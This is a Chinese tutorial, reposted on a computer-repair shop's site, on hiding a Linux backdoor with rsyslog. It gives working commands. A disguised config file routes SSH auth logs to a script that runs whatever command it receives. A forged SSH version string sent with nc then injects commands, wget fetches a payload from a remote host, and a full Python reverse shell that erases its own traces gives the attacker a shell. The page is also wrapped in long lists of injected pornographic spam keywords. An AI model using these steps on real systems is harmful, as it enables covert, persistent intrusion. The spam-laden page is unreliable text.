国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
關于利用Rsyslog隱藏系統后門

作者: 佚名  日期:2017-07-02 11:37:28   來源: 本站整理

 0×01. 關于Rsyslog
ryslog 是一個快速處理收集系統日志的程序,提供了高性能、安全功能和模塊化設計。rsyslog 是syslog 的升級版,它將多種來源輸入輸出轉換結果到目的地,據官網介紹,現在可以處理100萬條信息。
特性:
1.多線程
2.支持加密協議:ssl,tls,relp
3.mysql、oracle、postgreSQL
4.等等..
一般主流的Linux發行版本中都會自帶Rsyslog服務,本文則利用這個常見的日志服務隱藏系統后門
0×02. 實例演示利用Rsyslog 隱藏系統后門
試驗環境
10.1.100.1       遠程服務器,提供反彈py腳本下載 (windows7)
10.1.100.2       控制端   (centos)
10.1.100.3       被控端    (kali)
一、被控端配置
1. 給rsylog添加后門配置文件
在被控端 上執行以下命令(假設你已經獲取victim的 root權限)
man -a rsyslogd syslog | sed 's/^/#&/g' | sed '187 aauth.* ^/bin/snmp #' > /etc/rsyslog.d/README.conf
這串命令的意思試講 關于rsyslogd syslog的所有man 幫助信息導入到/etc/rsyslog.d 目錄下的README.conf文件中,且在README.conf 文件的188行寫入
auth.* ^/bin/snmp #
命令中之所以寫成aauth, 是因為a是sed的中的關鍵字,被自動過濾掉,所以要多寫一個
命令執行完之后的,結果如下:

我們知道 Rsyslog 服務會將/etc/resyslog.d 目錄下的*.conf 文件都認為是配置文件, 這里將名字定為 README.conf 也是增強迷惑性(當然你也可以找到rsyslog的配置文件,然后修改這個配置文件)
我們來看配置文件中唯一一行沒有被注釋掉的代碼
auth.* ^/bin/snmp #
之所以將其放在188行,因為一般人看到這么多注釋行,不會繼續往下翻, 將配置行 放在這里不容易被發現
其中auth 表示的是PAM認證產生的日志
auth.* ^/bin/snmp #  的意思是將 PAM 產生的所有日志都發往/bin/snmp 程序
這里的/bin/snmp 就是我們留下的后門,snmp也是為了增強迷惑性而命名的
2.  編寫后門代碼
后門是一個很簡單,設置可以說是簡陋的sh腳本, 代碼如下:
#!/bin/sh
sh -c "$1"
$1 表示傳給腳本的第1個參數內容
-c 表示將 $1的字符串內容當做sh命令執行
別忘了給后門增加可執行權限
chmod 755 /bin/snmp
3. 重啟rsyslog 服務
systemctl restart rsyslog
至此 被控端配置完畢
二、控制端配置
一般的系統都會開放SSH 服務,而且ssh 是基于PAM認證的,所以ssh認證登錄中產生的日志都會發往 /bin/snmp
1. 在控制端執行監聽,等待shell反彈

2. 在控制端執行如下命令,下載反彈py腳本,并保存在被控端的/tmp/x.py:
echo "';wget http://10.1.100.1/x.py -O /tmp/x.py;'"|nc 10.1.100.3 22
我們知道ssh 協議在通信的時候首先需要交換ssh版本信息,已確定是否可以通信
所以這里 ‘;wget http://10.1.100.1/x.py -O /tmp/x.py;’ 相當于向victim (10.1.100.3) 宣告自己的ssh版本(顯然這里是偽造的,但這不重要),這個版本宣告信息會被rsyslog捕獲,并將其傳至/bin/snmp, /bin/snmp 會將;wgethttp://10.1.100.1/x.py -O /tmp/x.py;視為入參, 然后執行腳本
也即:
sh -C ";wget http://10.1.100.1/x.py -O /tmp/x.py;"
不知道你注意到沒,這里在wget 的命令前后加上;目的是為了防止ssh通信中其他日志信息干擾wget 命令執行
x.py 代碼如下:
    import os
    import pty
    import socket
    
    lhost = "10.1.100.2" # XXX: CHANGEME
    lport = 31337 # XXX: CHANGEME
    
    def main():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((lhost, lport))
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        os.putenv("HISTFILE",'/dev/null')
        pty.spawn("/bin/bash")
        os.remove('/tmp/x.py')    # 退出后銷毀自身
        s.close()
        
    if __name__ == "__main__":
        main()
命令執行結果:

被控端查看,下載成功

4. 執行x.py, 反彈shell
控制端執行:
echo "';python /tmp/x.py;'"|nc 10.1.100.3 22
控制端查看,獲取shell



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    91麻豆精品91久久久久同性| 国产不卡一二三区| 超碰97人人人人人蜜桃| 国产成人综合精品| 国产伦精品一区二区三| 成人在线观看视频网站| 久久久久久久久四区三区| 日韩在线精品一区| 不卡的av电影| 外国成人在线视频| av一级亚洲| 超碰超碰人人人人精品| 91热爆在线观看| 免费看裸体网站| 日本免费高清一区| 亚洲在线播放电影| 永久久久久久| 亚洲天堂网一区| 国产麻豆剧传媒精品国产av| 天天舔天天操天天干| 色欲AV无码精品一区二区久久| 国产精品人人人人| 国产天堂在线播放| 在线免费观看成人网| 精品国产一区二区三| 国产精品福利网| 成人在线看片| 成人污网站在线观看| 国产视频在线观看网站| 亚洲xxx在线观看| 国产精品 欧美激情| 免费看一级视频| 国产麻豆麻豆| 粗大的内捧猛烈进出在线视频| 91成人短视频在线观看| 91精品日本| 国产尤物一区二区在线| 久久99久久99| 国产精品综合一区二区| 91网站黄www| 中文字幕一区二区三区四区不卡| 亚洲成人激情av| 亚洲第一区第二区| 国产一区二区精品丝袜| 91在线播放国产| 欧美大黑帍在线播放| 日韩乱码一区二区三区| 日本精品久久久久| 免费在线黄网| 免费观看欧美大片| 国产99久久久国产精品潘金| 亚洲精品中文字幕在线观看| 日韩欧美国产一区二区| 欧美va亚洲va在线观看蝴蝶网| 中文字幕日韩精品有码视频| 91久久精品美女高潮| 人人妻人人藻人人爽欧美一区| 国产黄色美女视频| 日本一区二区免费不卡| 91九蝌蚪视频| 久久免费看视频| 国产精品久久久久久妇女| 奇米狠狠一区二区三区| 欧美日韩日本国产| 国产一区av在线| 亚洲国产精品一区二区第四页av| 野花社区视频在线观看| 色屁屁草草影院ccyycom| 成年网站在线看| av小次郎在线| 麻豆成人入口| 日韩av中文字幕一区二区三区| 成人三级视频| 狠狠久久综合| 日韩电影免费观看高清完整版| 伊人久久影院| 久久久国产精品午夜一区ai换脸| 欧美欧美欧美| 久久不射中文字幕| 丝袜av一区| 日本少妇一区二区| 91片在线免费观看| 电影午夜精品一区二区三区| 91淫黄看大片| 欧美videos巨大粗暴| 日本在线小视频| 国语对白在线播放| 精产国产伦理一二三区| 国产精品一区二区美女视频免费看| 老牛国产精品一区的观看方式| 精品一区精品二区| 国产视频在线一区二区| 亚洲欧美精品| t66y永久入口地址| 国产51人人成人人人人爽色哟哟 | 久久精品国产精品亚洲综合| 一区二区国产精品| 精精国产xxx在线视频app| 高清免费电影在线观看| 国产亚洲成人一区| 成人一二三区视频| www.亚洲在线| 一本大道综合伊人精品热热| 久久久视频在线| 国产精品无码人妻一区二区在线| 国产精品亚洲综合| 成人av无码一区二区三区| 屁屁影院在线观看| 一区二区在线视频观看| 欧美精品三级在线观看| 精品国产一区二区三区免费 | 女厕盗摄一区二区三区| 日韩国产欧美在线观看| 国产精品69久久| 国产精品无码在线播放| 成人在线观看免费| 韩日成人av| 亚洲午夜在线观看视频在线| 欧美黄色性视频| 天堂在线一区二区三区| 一级片视频播放| 交100部在线观看| 大伊人狠狠躁夜夜躁av一区| 青青草原国产免费| 中文字幕av观看| 黄网页免费在线观看| 国产精品99久久精品| 秋霞午夜鲁丝一区二区老狼| 精品电影一区二区三区| 亚洲精品人成| 免费在线观看的黄色网址| 日韩欧美中文字幕电影| 在线亚洲国产精品网| 人妻精品久久久久中文| xxx性欧美| 91丨九色porny丨蝌蚪| 中文字幕一区二区三区有限公司 | 久久久国产免费| 国产成人无吗| 亚洲一区视频在线观看视频| 成年人在线看片| 成人亚洲国产| 精品国产麻豆| 久久久国产一区二区三区四区小说| 久久99精品久久久久子伦| 国产农村一级特黄α**毛片| 另类中文字幕网| 五月天丁香综合久久国产| 最新黄色网址在线观看| 琪琪久久久久日韩精品| 欧美成人一区二区| 国产 porn| 黄网址在线播放免费| 国产性做久久久久久| 伊人亚洲福利一区二区三区| 亚洲图片 自拍偷拍| 91美女在线免费观看| 免费观看在线综合| 国产91在线视频| 亚洲免费黄色网址| 欧美日韩伦理| 欧美一级欧美三级在线观看| 国产美女视频免费看| 国产女主播在线直播| 欧美在线播放高清精品| 成人国产一区二区三区| 国产精品美女一区二区视频| 国产一区二区高清| 日本在线播放一区| 污污网址在线观看| 欧美无砖砖区免费| 欧美国产精品一二三| 在线a免费看| 午夜精品久久一牛影视| 欧美二区三区在线| 亚洲爱爱天堂| 俺要去色综合狠狠| 国产精品一区二区av| 国产午夜在线| 欧美性猛片aaaaaaa做受| 久久久久久欧美精品se一二三四| 欧美性爽视频| 91久久精品国产91性色tv| 99亚洲国产精品| 最新av中文字幕| 一本久久a久久免费精品不卡| 中文字幕三级电影| 色播在线观看| 欧美日韩精品欧美日韩精品一综合| 给我免费观看片在线电影的| av色综合久久天堂av色综合在| 国产三级精品视频| www.xxx亚洲| 多野结衣av一区| 亚洲香蕉伊综合在人在线视看| 国产精品女同一区二区| 韩国午夜理伦三级不卡影院| 神马影院我不卡| 两个人看的免费完整在线观看| 日韩欧美精品在线视频|